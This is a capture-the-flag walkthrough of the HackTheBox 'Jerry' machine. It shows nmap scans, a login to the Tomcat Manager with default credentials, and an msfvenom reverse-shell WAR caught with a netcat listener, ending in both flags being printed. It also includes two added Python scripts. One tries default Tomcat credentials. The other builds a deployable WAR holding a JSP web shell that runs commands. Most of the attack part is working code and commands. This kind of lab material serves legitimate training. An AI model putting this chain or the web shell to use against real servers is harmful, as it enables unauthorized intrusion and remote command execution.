1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.95
# 8080/tcp open http-proxy

nmap -oN jerry -p8080 -sC -sV -v 10.10.10.95
# 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
# |_http-favicon: Apache Tomcat
# | http-methods:
# |_  Supported Methods: GET HEAD POST OPTIONS
# |_http-server-header: Apache-Coyote/1.1
# |_http-title: Apache Tomcat/7.0.88
2. Enumerate Apache Tomcat service (port 8080)
[x] Click on Manager App
[x] 401 Unauthorized without credentials; Tomcat's stock 401 page reproduces the example tomcat-users.xml from the Manager docs:
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
[x] Try to log in to Manager App with the example credentials (they are accepted, so the shipped example config was left in place)
[x] USERNAME: tomcat
[x] PASSWORD: s3cret
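The manual check above (Basic auth against /manager/html with the documentation credentials) as an added Python example; this is not code from the original notes. The candidate list is a constructed shortlist, the target URL is the box address, and the fetch hook is there only so the logic can be exercised without a live host. Keep the list short on purpose: Tomcat 7's default server.xml wraps the user database in a LockOutRealm (5 failures, 300 s lockout), so a long wordlist locks the very account you want.

```python
"""Check a Tomcat Manager for well-known default credentials over HTTP Basic auth."""
import base64
import urllib.error
import urllib.request

MANAGER_PATH = "/manager/html"

# Constructed shortlist of documentation/default Tomcat credentials (assumption:
# not exhaustive). The default Tomcat 7 LockOutRealm locks an account for 300 s
# after 5 failures, so do not feed a long wordlist through this.
CANDIDATES = [
    ("tomcat", "s3cret"),   # the example pair shown on the stock 401 page
    ("tomcat", "tomcat"),
    ("admin", "admin"),
    ("admin", ""),
]


def basic_auth_header(username, password):
    """Build the Authorization header value for HTTP Basic auth."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return "Basic " + token


def http_status(url, headers, timeout=5):
    """GET url and return the status code; urllib raises on 4xx/5xx, so catch that."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code


def try_logins(base_url, candidates=CANDIDATES, fetch=http_status):
    """Try each candidate against /manager/html.

    Returns (accepted, valid_but_unprivileged): Tomcat answers 200 for a user
    holding manager-gui, 403 for a valid login that lacks the role, 401 otherwise.
    `fetch` is injectable so the logic can be tested without a live target.
    """
    url = base_url.rstrip("/") + MANAGER_PATH
    accepted, unprivileged = [], []
    for user, pw in candidates:
        status = fetch(url, {"Authorization": basic_auth_header(user, pw)})
        if status == 200:
            accepted.append((user, pw))
        elif status == 403:
            unprivileged.append((user, pw))
    return accepted, unprivileged


if __name__ == "__main__":
    ok, partial = try_logins("http://10.10.10.95:8080")
    print("manager-gui:", ok)
    print("valid login, no manager-gui role:", partial)
```

A 403 is worth reporting separately: it means the password is right but the account only holds a role such as manager-script or admin-gui, which changes which Manager interface you can use.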
3. Exploit war file upload in Apache Tomcat
[x] Create jsp payload (shell.war) using msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=HTB_IPv4 LPORT=4444 -f war > shell.war
# Payload size: 1098 bytes
# Final size of war file: 1098 bytes
[x] Set-up local listener
nc -lvp 4444
# Listening on [unknown] (family 0, port 4444)
[x] Upload shell.war through the Manager App's "WAR file to deploy" form and navigate to http://10.10.10.95:8080/shell
[x] Back on the netcat listener, a shell arrives in the Tomcat install directory
C:\apache-tomcat-7.0.88> cd ..
C:\> dir
# 06/18/2018 10:31 PM <DIR> Users
C:\> dir Users
# 06/18/2018 10:31 PM <DIR> Administrator
C:\> dir Users\Administrator
# 06/19/2018 06:09 AM <DIR> Desktop
C:\> dir Users\Administrator\Desktop
# 06/19/2018 06:09 AM <DIR> flags
C:\> dir Users\Administrator\Desktop\flags
# 06/19/2018 06:11 AM 88 2 for the price of 1.txt
C:\> type "Users\Administrator\Desktop\flags\2 for the price of 1.txt"
# user.txt
# 7004dbcef0f854e0fb401875f26ebd00
#
# root.txt
# 04a8b36e1545a455393d067e772fe90e
No privilege escalation is needed: the Tomcat service already has enough rights to read the Administrator's desktop, so both flags come out of the one file.
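To show what msfvenom packs into shell.war, here is an added Python example (not code from the original notes) that builds the same kind of WAR by hand: a zip holding WEB-INF/web.xml plus a JSP. The JSP is a constructed command-execution page that takes ?cmd= rather than the reverse shell used above; the output filename shell.war and the /shell context path are assumptions. Deploy it through the same "WAR file to deploy" form and browse to /shell/?cmd=cmd%20/c%20whoami.

```python
"""Build a minimal WAR (a zip with WEB-INF/web.xml) around a command-execution JSP."""
import io
import xml.etree.ElementTree as ET
import zipfile

# Deployment descriptor; Tomcat serves index.jsp at the context root (/shell/).
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>
</web-app>
"""

# Constructed JSP web shell: runs ?cmd=... via Runtime.exec and returns stdout.
# On Windows, shell builtins such as dir need a "cmd /c" prefix.
CMD_JSP = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) {
        out.println(line);
    }
}
%>
"""


def build_war(jsp_source=CMD_JSP, jsp_name="index.jsp"):
    """Return WAR bytes: a zip containing the descriptor and the JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the archive members, sorted, for a quick look at what will be deployed."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def validate_war(war_bytes):
    """Sanity-check before uploading: intact zip, parseable web.xml, at least one JSP."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        if war.testzip() is not None:
            return False
        names = war.namelist()
        if "WEB-INF/web.xml" not in names:
            return False
        root = ET.fromstring(war.read("WEB-INF/web.xml"))
        if not root.tag.endswith("web-app"):
            return False
        return any(n.endswith(".jsp") for n in names)


if __name__ == "__main__":
    data = build_war()
    if not validate_war(data):
        raise SystemExit("built WAR failed validation")
    with open("shell.war", "wb") as f:   # assumed output name, matches the notes
        f.write(data)
    print("wrote shell.war:", war_entries(data))
```

The validation step is cheap insurance: a malformed descriptor makes Tomcat reject the deployment with only a generic "FAIL" message in the Manager, which is easy to misread as a permissions problem.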